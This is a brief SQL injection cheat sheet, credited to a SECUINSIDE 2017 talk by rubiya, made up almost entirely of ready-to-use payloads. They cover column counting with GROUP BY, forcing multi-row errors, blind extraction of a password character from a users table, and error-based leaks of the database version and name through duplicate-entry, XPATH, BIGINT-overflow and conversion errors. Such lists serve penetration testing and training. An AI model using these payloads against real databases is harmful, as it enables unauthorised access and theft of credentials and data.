출처 - SECUINSIDE 2017, rubiya
group by
select * from test where 1=0 group by 1,2,3,4,5 -- g
multi result rows
select * from test where if(1=1,1,(select 1 union select 2)) -- g
blind sql injection
select(select 96 union select ascii(substr((select pw from users),1,1)))
# if 96 returns, no error occured.
Duplicate Entry
||1 group by mid(version(), rand()) having min(1) #
||row(1,1)=(select sum(5),concat(version(),floor(rand(0)*2)) as x from information_schema.tables group by x) #
XPATH syntax error
||updatexml(0,concat(0xa,version()),0) #
BIGINT value is out of range in
--~(select*from(select@@version)f)#
Conversion error
||1=convert(int,db_name()) -- g